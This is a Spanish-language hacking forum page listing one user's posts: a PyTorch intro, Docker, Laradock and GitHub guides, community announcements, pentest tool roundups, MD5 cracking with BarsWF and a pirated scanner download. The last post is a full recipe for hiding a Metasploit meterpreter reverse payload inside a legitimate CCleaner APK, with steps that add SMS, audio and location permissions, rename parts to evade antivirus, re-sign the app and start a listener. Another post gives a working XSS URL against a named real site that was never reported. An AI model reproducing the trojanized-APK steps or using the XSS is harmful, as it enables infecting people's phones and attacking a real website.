Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - ANTRAX

Páginas: [1] 2 3 ... 61
1
Python / Pytorch – Redes Neuronales en Python
« en: Agosto 11, 2019, 05:16:23 pm »

Últimamente hay un gran revuelo por la inteligencia artificial y redes neuronales, Pytorch es una librería de Python que permite hacer cálculos numéricos haciendo uso de la programación de tensores. No solo esto, sino que permite utilizar la GPU para acelerar aún más los cálculos.

Pytorch está ganando mucho terreno en esta área, porque es muy sencillo de utilizar, además a pesar de ser una librería reciente, hay mucha documentación con ejemplos para usarla. Otra curiosidad a tener en cuenta, es que posee una comunidad que esta creciendo muchísimo, en donde cada vez más programadores comparten sus códigos y experiencias. Por último, cabe destacar que es la librería principal que utiliza Facebook para aplicaciones de Deep Learning.

Pytorch se basa en el uso de tensores, que pueden ser equipados con vectores de una o muchas dimensiones.

Para entender un poco mejor el concepto de red neuronal, podemos decir que es un sistema de nodos interconectados de forma ordenado, distribuido por capas. A través de estas capas es posible captar una señal de entrada y emitir una salida. Se conoce como red neuronal, ya que es básicamente una emulación a la red biológica del reino animal. Estas capas pueden ser “entrenadas” para que aprendan.

Primeros pasos con Pytorch

Para instalar Pytorch, entramos a su web oficial:  https://pytorch.org y en la parte de Quick Start, veremos algo como lo siguiente:


Automáticamente identifica nuestro sistema operativo, packages, versión de Python, y CUDA es por si disponemos de alguna tarjeta gráfica. En mi caso detectó la versión 9.0. En caso de no tener, simplemente seleccionamos NONE.

Por último, nos genera el comando que debemos correr desde nuestra consola, en mi caso:

Código: Python
  1. pip3 install https://download.pytorch.org/whl/cu90/torch-1.1.0-cp37-cp37m-win_amd64.whl
  2. pip3 install https://download.pytorch.org/whl/cu90/torchvision-0.3.0-cp37-cp37m-win_amd64.whl

Una vez instalado, podemos importarlo en nuestro proyecto de la siguiente manera

import torch

Con esto ya podemos comenzar a utilizar esta potente librería. A continuación, veremos como verificar si tenemos disponible CUDA para procesar datos utilizando la GPU, lo que logrará que las ejecuciones sean más veloces.

En una consola, importamos torch y luego tipeamos: torch.cuda.is_available()


En caso de estar disponible, nos responderá con un True.
Ahora veamos un ejemplo de como cargarle datos a un tensor, y luego como sumar tensores utilizando la GPU.
Comenzaremos creando un tensor de la siguiente forma: import torch

Código: Python
  1. import torch
  2. x = torch.Tensor(5,4)
  3. print (x)

Al correr el script, tendremos un resultado como este:


Ahora crearemos 2 tensores y los sumaremos.

Código: Python
  1. import torch
  2. x = torch.Tensor(5,4)
  3. y = torch.Tensor(5,4)
  4. z = x+y
  5. print (z)


Finalmente haremos esta misma suma, pero utilizando la GPU, para ello colocamos lo siguiente:

Código: Python
  1. import torch
  2. x = torch.Tensor(5,4)
  3. y = torch.Tensor(5,4)
  4. x = x.cuda()
  5. y = y.cuda()
  6. z = x+y
  7. print (z)


Básicamente lo que hacemos es pasar nuestras variables que estaban en la CPU a la GPU y luego podemos sumarla con normalidad.

Se puede hacer una infinidad de cosas interesantes con esta potente librería de Python, la limitación la pone la imaginación de cada uno.

Saludos,
ANTRAX

2
Underc0de / Felicidades Denisse! - Nueva Co-Admin de Underc0de
« en: Junio 07, 2019, 02:37:32 pm »
Hola a todos!

Con este post anuncio oficialmente que la comunidad tiene una nueva Co-Administradora, rango otorgado por su gran dedicación y desempeño en Underc0de.
Felicitaciones @Denisse espero que sigas colaborando como lo has hecho desde el primer día!
Tienes más que merecido tu nuevo puesto en Underc0de, cuidalo y defiendelo hasta el final!

Saludos,
ANTRAX

3
Hacking / Penbox - Nuevo Framework de Pentesting
« en: Mayo 29, 2019, 11:49:56 am »

PenBox es un framework de pentesting, incluye repositorio de varias herramientas en sus últimas versiones. Entre ellas:

Information Ghatering

nmap
Setoolkit
Port Scanning
Host To IP
wordpress user enumeration
CMS scanner
XSStracer -
Doork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users


Password Attack:

Cupp
Ncrack
AutoBrowser Screenshot


Wireless Testing:

reaver
pixiewps
Bluetooth Honeypot GUI Framework


Exploitation Tools:

Venom
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Blind SQL Automatic Injection And Exploit
Bruteforce the Android Passcode given the hash and salt
Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection Scanner
cms Few
BLACKBOx
Liffy


Sniffing & Spoofing:

Setoolkit
SSLtrip
pyPISHER
SMTP Mailer


Web Hacking:

Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Sub-domain Scanning
Wordpress Scanning
Wordpress Username Enumeration
Wordpress Backup Grabbing
Sensitive File Detection
Same-Site Scripting Scanning
Click Jacking Detection
Powerful XSS vulnerability scanning
SQL Injection vulnerability scanning


Private Tools

Get all websites
Get joomla websites
Get wordpress websites
Find control panel
Find zip files
Find upload files
Get server users
Scan from SQL injection
Scan ports (range of ports)
Scan ports (common ports)
Get server banner
Bypass Cloudflare


Post Exploitation

Shell Checker
POET
Weeman - Phishing Framework
Insecure Web Interface
Insufficient Authentication/Authorization
Insecure Network Services
Lack of Transport Encryption
Privacy Concerns
Insecure Cloud Interface
Insecure Mobile Interface
Insufficient Security Configurability
Insecure Software/Firmware
Poor Physical Security
Radium-Keylogger - Python keylogger with multiple features


Recon

Sniper

Smartphones Penetration

Attach Framework to a Deployed Agent/Create Agent
Send Commands to an Agent
View Information Gathered
Attach Framework to a Mobile Modem
Run a remote attack
Run a social engineering or client side attack
Compile code to run on mobile devices
Install Stuff
Use Drozer
Setup API
Bruteforce the Android Passcode given the hash and salt


Repo: https://github.com/x3omdax/PenBox

Saludos,
ANTRAX

4
Off Topic / Comparte tus memes favoritos!
« en: Abril 19, 2019, 03:42:34 pm »

5
Back-end / Entorno de desarrollo moderno (Parte II)
« en: Abril 02, 2019, 04:11:07 pm »

Hola a todos los lectores! Gracias por los comentarios que dejaron en la primer parte, así como también las recomendaciones para encarar esta segunda.

En esta segunda entrega vamos a ver lo que es Docker y Laradock, como para ir preparando nuestro entorno de desarrollo enfocado a la programación en Laravel.

Docker

Según su documentación oficial, la idea de Docker es crear contenedores ligeros y portables para las aplicaciones software que puedan ejecutarse en cualquier máquina con Docker instalado, independientemente del sistema operativo que la máquina tenga por debajo, facilitando así también los despliegues.


La idea del contenedor, es porque al contenido lo podes llevar a otra PC con Docker y funcionará. En otras palabras, es portable.

Lo bueno de Docker, es que dentro de ese contenedor, mete también todas las dependencias que el proyecto necesita para que funcione, como Java, Maven, Tomcat, entre otros… De esta manera, puedo llevarme mi contenedor a otra máquina con Docker y no debo preocuparme por las versiones de software, o si tiene o no alguna dependencia instalada.

Sabiendo todo esto, pasaremos a la instalación de Docker en nuestra PC. Para ello vamos a la web oficial: https://www.docker.com/get-started seleccionamos nuestro sistema operativo y lo descargamos.

NOTA: Para descargarlo, es necesario tener una cuenta en Docker.


Una vez descargado, procederemos a la instalación.


Una vez instalado, ya tendremos Docker en nuestra PC.


Tendremos ese nuevo ícono en nuestra barra de aplicaciones en ejecución que dirá algo como que Docker se está iniciando. Debemos esperar a que se ejecute y la primera vez es algo que suele llevar un poco más de lo normal.


Luego mostrará un mensaje como la captura anteriormente mostrada, para habilitar Hyper-V y nos pedirá reiniciar la computadora. Al reiniciarse, mostrará el mensaje de que se están instalando algunas actualizaciones


También puede que nos muestre un mensaje como el anterior de que el servicio no esta iniciado, solo basta con clickear en Start y el servicio se iniciará.

Una vez iniciado, nos pedirá iniciar sesión con nuestras credenciales de Docker (Las que usamos para descargarlo)


Insertamos nuestras credenciales y clickeamos en Log In. Una vez hecho todo esto, ya tendremos todo listo para instalar Laradock.

Laradock

Ahora descargaremos Laradock desde su repositorio oficial, asique abrimos una consola y pondremos lo siguiente:

Código: Text
  1. git clone https://github.com/Laradock/laradock.git

Una vez descargado, entraremos a su carpeta y haremos una copia de su archivo .env el cual contiene configuraciones del ambiente.

Código: Text
  1. cp env-example .env

Finalmente instalaremos los contenedores que utilizaremos para utilizar Laradock

Código: Text
  1. docker-compose up -d nginx mysql phpmyadmin redis workspace

Este último paso suele demorar MUCHISIMO la primera vez, ya que descarga e instala todo, pero una vez hecho, la segunda vez que levantemos estos servicios, lo hará mucho más rápido.

Ahora solo queda esperar un buen rato… El tiempo dependerá de nuestra PC y de nuestra conexión a internet.

Les dejo una captura de todos los comandos anteriormente comentados.


Ahora les muestro un poco el proceso de descarga e instalación:


Mientras se instala todo, nos mostrará algo como lo siguiente:




Estas 3 capturas nos piden basícamente permisos para utilizar servicios y diretorios de Windows. Simplemente le damos acceso y continuará con el proceso de instalación. Una vez que finalice, veremos algo como esto:


En este caso, muestra algunos errores, sinceramente no se porque son… Es como que no iniciaron ciertos servicios, y si tipeamos en la consola el comando “docker-compose ps” podremos ver los servicios funcionando. Solo me levantó los relacionados a la base de datos.

Para solucionarlo solamente debemos frenarlos y volverlos a levantar.


Para frenarlo tipeamos: “docker-compose stop” y para levantarlo, nuevamente el comando anteriormente comentado. Y ahora si tenemos todos los servicios funcionando.

Ahora viene un paso de suma importancia, el cual es modificar la ruta de Nginx que tiene como referencia para leer nuestros archivos.

Para ello nos vamos a la carpeta de Laradock en donde está Nginx y modificamos el archivo default.conf

Debemos modificar la linea subrayada en la captura:


El directorio /var/www/ es el directorio raiz en donde se encuentra laradock. Lo que hice yo, fue crear una carpeta llamada prueba y ahí adentro creé un index.php, ya que Nginx lee archivos .php o .html con el nombre index (tal como muestra la linea 4)

Entonces pasando en limpio, nos vamos al directorio raiz, creamos un directorio y ahí adentro colocamos nuestro index.php


Guardamos todo y entramos a http://localhost y si hicimos todo bien, veremos nuestro index.php


Con esto damos por finalizado la parte 2 de esta serie de papers para dejar a tono nuestro entorno de desarrollo. En la tercera y última parte les mostraré como instalar Laravel y con eso ya tendremos todo listo para arrancar a desarrollar.

Creditos: Gianella

6
Back-end / Entorno de desarrollo moderno (Parte I)
« en: Marzo 30, 2019, 03:03:33 pm »

Hola lectores! Recientemente estoy incursionando nuevamente sobre nuevas tecnologías, sobre todo en nuevas herramientas de desarrollo y Framework.

Decidí aprovechar a mi amigo Moises, experto en PHP, para pedirle algunas recomendaciones sobre herramientas que se utilizan hoy en día en empresas de desarrollo, así como también sobre algún Framework potente para desarrollar en ese lenguaje.

De forma resumida lo ideal sería utilizar lo siguiente:

– Framework: Laravel: https://laravel.com/
– Virtualización: Docker (Laradock): https://laradock.io/
– Editor de texto: PHPStorm: https://www.jetbrains.com/phpstorm/ – Atom: https://atom.io/
– Manejador de BD: DBeave: https://dbeaver.io/
– Repositorios: GitHub >> GitHub Desktop: https://desktop.github.com/

Si alguno de ustedes utiliza algún otro tipo de Framework como Codeignither o similar, puede dejarlo como comentario, así como si utilizan otro editor de texto, manejador de base de datos, etc.

A lo largo de estas guías, iré mostrando como montar crear un repositorio en GitHub, como clonarlo en nuestra PC usando GitHub Desktop, luego instalaremos Docker y Laradock y por último iniciaremos un proyecto nuevo en Laravel.

Me topé con muchos problemas mientras intentaba poner a punto mi entorno de desarrollo y la información que encontré para solucionarlos, estaba en otros idiomas… De hecho estuve horas batallando con un error y finalmente la solución la encontré en un video de YouTube que estaba en portugués!

En fin… Sin más vueltas que dar, vamos a iniciar con esta especie de taller práctico de como tener un entorno de desarrollo moderno.



Crear un repositorio en GitHub

A todo esto.. ¿Qué es GitHub…?
De manera resumida, GitHub es una especie de contenedor de código en la nube, que sirve para mantener versionado nuestro código fuente. Además, permite que más personas desarrollen al mismo tiempo que nosotros sobre el mismo código


Ahora bien, entremos al sitio de GitHub y creemos nuestra cuenta o iniciemos sesión.


Una vez adentro, en la parte superior derecha, clickearemos en el + que aparece y daremos click en “New Repository“


Ahora le pondremos un nombre a nuestro repo, una descripción de que tratará el proyecto, y si será público o privado. Al finalizar, clickearemos el botón verde para crear nuestro repositorio.


Finalmente, si todo salió bien, veremos algo como lo siguiente:


Basicamente muestra algunos comandos para clonar el repo en nuestra PC desde la linea de comandos y algunas cosas más. Por ahora no haremos nada de eso, ya que utilizaremos GitHub Desktop

GitHub Desktop

Lo que haremos ahora, será ir a la web de GitHub Desktop y lo desacargaremos.


Una vez descargado, lo ejecutaremos y veremos la pantalla de bienvenida de GitHub Desktop:


Clickearemos la opción de iniciar sesion “Sign in to GitHub.com” y utilizaremos nuestras credeciales de Github.com (La cuenta que usamos para crear el repo)


Una vez adentro, nos pedirá algunas configuraciones, como nuestro Mail y Nombre, los completamos y clickeamos en “Continue“


Una vez hecho esto, veremos todos los repos que tenemos en nuestra cuenta de GitHub. Como se ve en la siguiente imagen, se puede ver el nuevo de prueba que creamos anteriormente. Cabe destacar que desde acá también podríamos haber creado el repo, pero preferí mostrarle ambas alternativas.


Ahora solo resta clickear nuestro repo “prueba” y clickeamos el boton azul para clonarlo en nuestra PC.


En “Local path” colocaremos la ruta de nuestra PC en donde queremos que se descargue todo el repositorio con nuestro código. Una vez hecho esto, damos click en el botón “Clone“


Y eso es todo! Ya tenemos el repositorio clonado en nuestra PC. Ahora bien.. ¿Para qué sirve GitHub Desktop?
¿Recuerdan que después de crear el repositorio en GitHub mencionaba algunos comandos de consola? Bueno.. ya no les hará falta! De ahora en más, todo eso lo hace GitHub Desktop. Simplemente clickeando un botón, sube o baja nuestro código. En caso de haber conflicto, lo abrirá en Atom o en nuestro editor por defecto y nos dirá cual es el error para luego hacer el Merge.

Del tiempo que llevo usando esta herramienta, me ha facilitado la vida y ahorrado muchisimo tiempo. Más adelante lo veremos con ejemplos prácticos.

Por ahora esto es todo! En la segunda parte veremos como instalar Docker y Laradock

Aprovecho para dejarles un agradecimiento grande a Moises y Gianella que colaboraron con este taller.

Espero que les sirva!
ANTRAX

7
Reviews / Cursos de Udemy
« en: Febrero 20, 2019, 02:52:02 pm »
Hola a todos,

Quería saber si alguna vez tomaron algún curso de Udemy y que me comenten sus experiencias.
También quiero saber si dan algún tipo de certificado.

Saludos.
ANTRAX

8
Hacking / BarsWF – Rompiendo MD5 a alta velocidad
« en: Enero 04, 2019, 08:33:56 am »

Hola a todos, el día de hoy les traigo la herramienta BarsWF, la cual sirve para romper MD5 utilizando la GPU de nuestras PCs, lo que hace que sea un proceso más rápido.

Lo primero que devemos ver, es saber que tipo de procesador gráfico tenemos, para ello debemos ir al Devices Manager de Windows y en el árbol de Display adapter verificar cual tenemos.


En mi caso tengo NVIDIA GeForce. Esto es muy importante debido a que BarsWF tiene varias versiones y varían dependiendo el procesador gráfico que tengamos. En mi caso tengo que usar la versión CUDA.

La descarga pueden realizarla de su página oficial: https://3.14.by/en/md5/

Pero de igual forma, acá les dejo las versiones:

AMD BROOK Beta 0.9:
BarsWF Brook x64: https://3.14.by/files/BarsWF_Brook_x64.zip
BarsWF Brook x32; https://3.14.by/files/BarsWF_Brook_x32.zip

CUDA 0.B:
BarsWF CUDA x64: https://3.14.by/files/BarsWF_CUDA_x64_0b.zip
BarsWF CUDA x32: https://3.14.by/files/BarsWF_CUDA_x32_0b.zip

Una vez descargado, lo descomprimimos, abrimos una consola y parados sobre la carpeta en donde descomprimimos la tool, tipeamos lo siguiente:

Código: DOS
  1. barswf_cuda_x64.exe -h e10adc3949ba59abbe56e057f20f883e -c 0aA~

Parámetros:

-h: e10adc3949ba59abbe56e057f20f883e Hash a romper
-c 0aA~ : Acá le decimos que use números (0), minúsculas (a), mayúsculas (A), simbolos (~)
-C “abc23#” : Con esto le decimos que use solamente estos caracteres


Como pueden ver, rompió el hash en unos segundos usando la potencia de mi CPU.

Espero que les sirva!

9
Underc0de / Feliz 2019 Underc0ders!
« en: Diciembre 31, 2018, 03:19:35 pm »
Hola a toda la comunidad.

Quiero darles las gracias a cada usuario de Underc0de por estar siempre con nosotros, en los buenos y malos momentos apoyando el crecimiento de la comunidad.
Para este nuevo año tendremos muchas mejoras para continuar creciendo y para traerles mejor contenido y que sigamos aprendiendo juntos día a día.

Algunos de los proyectos nuevos que tendremos serán:

- Checklist de seguridad: un apartado en donde se detallaran todas las fallas webs que existen, que es, como explotarlas y como solucionarlo.
- UnderWiki: Una Wiki con terminos de informática y documentación de herramientas
- Plataforma de cursos gratuitos: Quizás para finales del 2019 levantemos una plataforma de cursos gratuitos
- Libros de seguridad: Veremos de retomar el tema de la escritura de libros sobre distintas ramas del hacking.

Por el momento serían estas cosas, como verán, aportará bastante contenido a Underc0de y conocimientos a ustedes.

Esperamos seguir creciendo, ganando nuevos usuarios y expandirnos un poco más como lo venimos haciendo.

Mil gracias a todos los que nos siguen y muy feliz 2019 para todos!

ANTRAX

10
Zona Webmaster / Malware Scanner Online [SRC]
« en: Diciembre 26, 2018, 11:03:01 am »
Hola a todos,

Les comparto este scanner de malwares online de pago, totalmente gratis.

Este Scanner les ayudará a revisar todo su sitio web con un solo click, puede encontrar virus, shells, codicos maliciosos o infectados, etc.
Tiene un panel de admin muy potente el cual va mostrando los resultados. Es muy customizable



Su instalación es muy sencilla.

1.- Subir todo el contenido por FTP
2.- Visitar la URL en donde quedó subido el contenido
3.- Iniciar la instalación con el Wizard.

Script Oficial: https://codecanyon.net/item/shell-scanner/5609275
Descarga free: https://www.sendspace.com/file/qmwrzh

Saludos,
ANTRAX

11
Zona Webmaster / Publica tu sitio web usando Github Pages
« en: Diciembre 26, 2018, 10:45:22 am »
# Introducción

Github no es solamente la plataforma por excelencia para compartir su código y proyectos con el resto del mundo. Sino que también ofrece servicio de hosting gratuito para tus proyectos en HTML, CSS y JS.

En este articulo te mostraré como configurar para publicar y publicar tu propio sitio web estático en Github.

1. Crear una cuenta de Github

Primero lo primero, conseguir una cuenta de Github para acceder a todas las características que ésta gran plataforma nos ofrece.

Hay planes de pago si quieres la opción de hacer tus repositorios en modo privado, esto ayuda a mucho ya cuando tienes grandes proyectos o desarrollas software donde realmente no quieres que vean nada sobre el código, sino es así y lo que deseas es compartir con lo demás, entonces está la cuenta gratuita que te permite acceder a todo excepto a lo antes mencionado.


Con una cuenta de Github, puedes platicar con otros programadores, contribuir en proyectos amigos o en proyectos de código abierto.

2. Instalar Git

Git es un sistema de control de versiones distribuido de código abierto y gratuito, diseñado para manejar todo, desde proyectos pequeños hasta proyectos muy grandes, con rapidez y eficiencia.


Una vez que tenemos instalado Git en nuestros ordenadores, es hora de pasar al siguiente paso.

3.- Crear un repositorio en Github

Lo primero que debemos hacer es dirigirnos a nuestro dashboard en nuestra cuenta de Github.

Como mi cuenta es nueva me aparece en el dashboard la opción de crear un Nuevo Repositorio, sino también en la parte superior derecho, en el símbolo ” + ” podemos crear un repositorio.


A continuación se abrirá la página para crear el nuevo repositorio, en la cual se ingresará el nombre del repositorio y opcionalmente una descripción para nuestro proyecto.

Código: Text
  1. Cabe destacar que el nombre de nuestro repositorio debe seguir la siguiente sintaxis username.github.io donde username es el nombre de usuario de nuestra cuenta de github. Para este ejemplo quedaría e la siguiente manera:
  2.  
  3. haunea.github.io


Una vez creado el repositorio, copiaremos la URL que nos proporciona porque ahí subiremos los archivos de nuestro sitio web,


4. Subir archivos al repositorio

Ahora viene la parte interesante, subir los archivos de nuestro sitio al repositorio de Github.

Para ejemplo de este articulo yo he creado un archivo html muy sencillo en la siguiente dirección de mi ordenador /Desktop/Proyectos/hauenaSite/.

Tenemos que abrir nuestra consola y dirigirnos hasta el directorio donde se encuentre su sitio web o los archivos de su sitio.

Después realizaremos los pasos siguientes:

4.1 Crear un nuevo repositorio Git dentro de nuestro directorio

Código: Text
  1. $ git init

4.2 Añadir los archivos para subir

Código: Text
  1. $ git add .

4.3 Realizar el primer commit

Código: Text
  1. $ git commit -m "first commit"

4.4 Agregar un repositorio (La URL que antes nos proporcionó en el dashboard)

Código: Text
  1. $ git remote add origin https://github.com/huanea/haunea.github.io.git

4.5 Subir los archivos al repositorio

Código: Text
  1. $ git push -u origin master

Código: [Seleccionar]
Probablemente si tu cuenta es nueva y no has configurado tus credenciales de Github en tu ordenador, te las va a pedir a la hora de hacer el paso 4.3. Solo sigan las instrucciones como aparecen en la consola.

5. Publicar nuestro sitio web

Finalmente el último paso es configurar nuestro repositorio para poder publicar nuestro sitio web a la URL heanua.gitub.io.

Para ello nos dirigimos al apartado de settings el cual se encuentra en el menú de nuestro repo.


En el apartado de settings encontraremos diversas configuraciones para nuestro repo, sin embargo lo que más nos interesa es la penúltima opción de Github Pages.


Lo único que deberemos de hacer es seleccionar en el Source la opción de Master Branch.

Ahora solo esperamos unos minutos que es el tiempo que Github se toma en publicar nuestro sitio y listo, tendremos un sitio web gratis.

Resultado: https://huanea.github.io/demo/


# Conclusión

Como podemos observar, es muy fácil tener un sitio web gratuito para esos proyectos que apenas vamos iniciando o darte a conocer si aún no tienes una solvencia económica para pagar un hosting.

Fuente: migantoju.com

12
Dudas y pedidos generales / [SOLUCIONADO] Google Maps API
« en: Diciembre 11, 2018, 10:18:17 am »
Hola a todos,

Quería saber si alguien ultimamente ha usado la API de Google Maps. Vi que ahora es pago, no he leido mucho al respecto.
Si alguno ya ha pagado la API podría explicarme cuanto se paga por mes o si es un solo pago y si esa API se puede usar en muchos sitios o solo en uno solo?

Saludos,
ANTRAX

13
Underc0de / Participá y ganá la remera de Underc0de!
« en: Noviembre 14, 2018, 10:29:51 pm »
Hola Underc0ders!

Como anunciamos por nuestra página de Facebook, sortearemos una remera el día 10 de Diciembre del 2018.
El motivo de este sorteo, es porque llegamos a los 60mil Likes en nuestra fan page! https://facebook.com/underc0de

El premio es una remera de underc0de y pueden participar todos los usuarios de la comunidad!


Al ganador se le enviará la remera por correo. En caso de haber complicaciones con el envío, simplemente contactaremos a alguna tienda que haga remeras en su ciudad y la enviamos a hacer ahí mismo pagando nosotros el coste.

Para poder participar, solo deben dejar su nick en este post y listo!



Participantes:

Código: Text
  1. Noxonsoftwares
  2. zentraedi
  3. lexa
  4. Lah-Vahn
  5. Lonigan
  6. Bartz
  7. Syst3m-c0d3r
  8. Gold Master.
  9. R3V0LV3
  10. DeBobiPro
  11. Solid Water
  12. Slenderhack
  13. ach1721
  14. Hacker fashion
  15. ikher1024
  16. Rudy Uchiha
  17. EXUMER
  18. Atomo
  19. Lanz
  20. leacim
  21. luispv0297
  22. Black Dog:.
  23. chatiel
  24. AntonioJesusGon
  25. b3l3r0f0nt3
  26. Devilspy
  27. baron.power
  28. novatryx
  29. Sergulath
  30. Antopixel
  31. TheWavs
  32. DHENON
  33. RileyBlue
  34. user_en1gm4
  35. SKS3001
  36. gfranchello
  37. Kalimero
  38. 79137913
  39. Zirvq
  40. $Hack$
  41. deibler
  42. dhaxok
  43. j34n
  44. Evocatorem
  45. rohdavalos
  46. Dani54
  47. K A I L
  48. AroonVa
  49. Sanji
  50. neuronass
  51. Luisfernando17
  52. Satyricon
  53. d4v!501
  54. VULN3T
  55. k1llj0y
  56. blackheartmqc
  57. kayto
  58. DjMikels
  59. ZanGetsu
  60. ghost77
  61. ErikPerez
  62. Stegic
  63. lammer2512 (dark)
  64. Victorf12
  65. tango_300
  66. micky
  67. ToniG123





Muchas gracias a todos por formar parte de esta gran comunidad! Los esperamos y mucha suerte!!

Underc0de Team

14
Arjun es una herramienta en python < 3.4 para el descubrimiento de parámetros web. Sus características principales son:

    Multihilo
    3 modos de detección
    Escaneo heuristico regex
    Enorme lista de nombres de parámetros (3370) de @SecLists


Descubrimiento de parametros

Para encontrar parámetros GET, puedes simplemente hacer:

Código: Python
  1. python3 arjun.py -u https://api.example.com/endpoint --get

Del mismo modo, usa --post para encontrar parámetros POST.

Multihilo

Arjun usa 2 hilos de forma predeterminada, pero se puede ajustar su rendimiento de acuerdo con la conexión de red.

Código: Python
  1. python3 arjun.py -u https://api.example.com/endpoint --get -t 22

Delay entre peticiones

Se puede ajustar el delay de las peticiones utilizando la opción -d de la siguiente forma:

Código: Python
  1. python3 arjun.py -u https://api.example.com/endpoint --get -d 2

Añadiendo encabezados HTTP

Al usar el parámetro --headers se abrirá un prompt interactivo donde se pueden pegar encabezados HTTP. Ctrl + S para guardar y Ctrl + X para procesar.


Nota: Arjun usa nano como editor predeterminado para el prompt, pero se puede cambiar en /core/prompt.py.

Github: https://github.com/s0md3v/Arjun

Fuente: hackplayers

15
Dudas y pedidos generales / Sistema para medicos (Historial clinico)
« en: Noviembre 03, 2018, 03:52:57 pm »
Hola a todos,

Quiero saber si alguno conoce o tiene algun sistema para medicos que sirva para llevar el historial clinico de sus pacientes que me pueda facilitar.

Saludos,
ANTRAX

16
Hacking ShowOff / [XSS] altamezcla.com.ar
« en: Octubre 21, 2018, 05:40:04 pm »
Hola, hoy vi una publicidad de Youtube que llevaba a la web de altamezcla.com.ar, entré a verla y me topé con un XSS en el buscador.


Vector: "'><script>alert(/XSS/)</script>
URL: https://altamezcla.com.ar/notas/listado?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
Lugar: Buscador
Reportado: NO

Saludos,
ANTRAX

17
Android / Esconder un payload en cualquier APK
« en: Octubre 05, 2018, 03:25:03 pm »
un APK es un paquete de aplicación de Android (Android Aplication Package) y que es como un .exe de Windows que contiene la aplicación y el instalador en el mismo paquete.


Lo que vamos a ver hacer es desempaquetar un .apk, y luego modificarlo añadiendo un payload generado por metasploit. Una vez construyamos ese paquete lo instalamos en un dispositivo Android haciendo que se ejecute la app legítima y a la vez nuestro payload dejando infectado el dispositivo Android.

Para empezar generamos el payload para Android con msf:

Código: Text
  1. msfvenom -p android/meterpreter/Payload_Type LHOST=(TU IP) LPORT=(PUERTO) -o meterpreter.apk


Luego nos descargamos una apk legítima como por ejemplo 'ccleaner' y decompilamos las dos con apktool:

Código: Text
  1. apktool d -f -o payload meterpreter.apk
  2. apktool d -f -o original ccleaner.apk


Copiamos la carpeta metasploit desde /payload/smali/com/metasploit a /original/smali/com/piriform


Nos vamos la carpeta ./original/ y editamos AndroidManifest.xml (con vim o el editor que queráis)


Buscamos las líneas siguientes que nos servirán como guía para encontrar la ruta a la aplicación principal que es la que nosotros queremos modificar:

Código: Text
  1. <action android:name="android.intent.action.MAIN"/>
  2. <category android:name="android.intent.category.LAUNCHER"/>

Encima de éstas, encapsulándolas habrá una etiqueta <activity
Nos fijamos en la propiedad Android:name= de esta etiqueta que tendrá una estructura similar a "com.piriform.ccleaner.ui.activity.MainActivity"


Por tanto, ya sabemos el fichero que tenemos que editar de nuestra app legitima (dentro de ./original/smali/), nos vamos a este fichero que será algoparecido a "com/piriform/ccleaner/ui/activity/MainActivity.smali" , es decir, por cada "." Será una "/".

Editamos este fichero .smali y buscamos la línea:

Código: Text
  1. ;->onCreate(Landroid/os/Bundle; )V

En la siguiente línea a esta ponemos:

Código: Text
  1. invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context; )V

Donde le indicamos que invoque nuestra app que en este caso es el Payload de msf y después continúe con la ejecución normal de la app legitima


Ahora vamos a añadir más permisos a esta app de los que tiene, nos vamos dentro del directorio de la aplicación ./original/ y modificamos el AndoridManifest.xml


Añadiremos los permisos que consideremos, en mi caso puse estos:

Código: Text
  1. <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
  2. <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
  3. <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  4. <uses-permission android:name="android.permission.SEND_SMS"/>
  5. <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  6. <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  7. <uses-permission android:name="android.permission.CALL_PHONE"/>

Si lo que queremos es ponérselo mas difícil a un antivirus que tuviera el móvil/Tablet podemos hacer lo siguiente dentro del directorio (Esto es opcional) ./original/smali/com/metasploit

Código: Text
  1. sed -i 's/metasploit/conf-schema/g' `rgrep -r metasploit ./* | awk '{print $1}' | cut -d':' -f1`
  2. sed -i 's/Payload/init-conf' `rgrep -r Payload ./* | awk '{print $1}' | cut -d':' -f1`
  3. sed -i 's/payload/init-conf' `rgrep -r payload ./* | awk '{print $1}' | cut -d':' -f1`

Después de eso debemos de cambiar el fichero Payload.smali por init-config.smal


también cambiamos el nombre de /original/smali/com/piriform/metasploit a /original/smali/com/piriform/conf-schema, además de todo eso deberemos de cambiar la línea

Código: Text
  1. invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

que hemos puesto antes con el nombre correspondiente:

Código: Text
  1. invoke-static {p0}, Lcom/conf-scheme/stage/init-conf;->start(Landroid/content/Context;)V

yo he puesto estos nombres pero podéis poner lo que queráis, ahora vamos a recompilar otra vez la app, hacemos:

apktool b original/

A continuación comenzará a construir nuestra app.


Dentro del directorio ./original/dist estará nuestra apk construida/compilada.

Ahora toca firmar la apk para que esta sea "legitima" por tanto creamos en nuestro home el directorio .android

mkdir ~/.android

Generamos la key para firmar con:

keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"

Para firmar con esa firma hacemos:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg SHA1withDSA /home/xarly/original/dist/ccleaner-v1-17-66.apk androiddebugkey

Ahora nos queda dejar a la escucha el metasploit con:

Código: Text
  1. msfconsole
  2. use exploit/multi/handler
  3. set Payload android/meterpreter/reverse_https
  4. set LHOST 192.168.1.135
  5. set LPORT 8181
  6. set ExitOnSession False
  7. exploit -j -z
  8.  

Ejecutamos la app en el móvil:






Deberíamos ver como se conecta nuestro meterpreter.

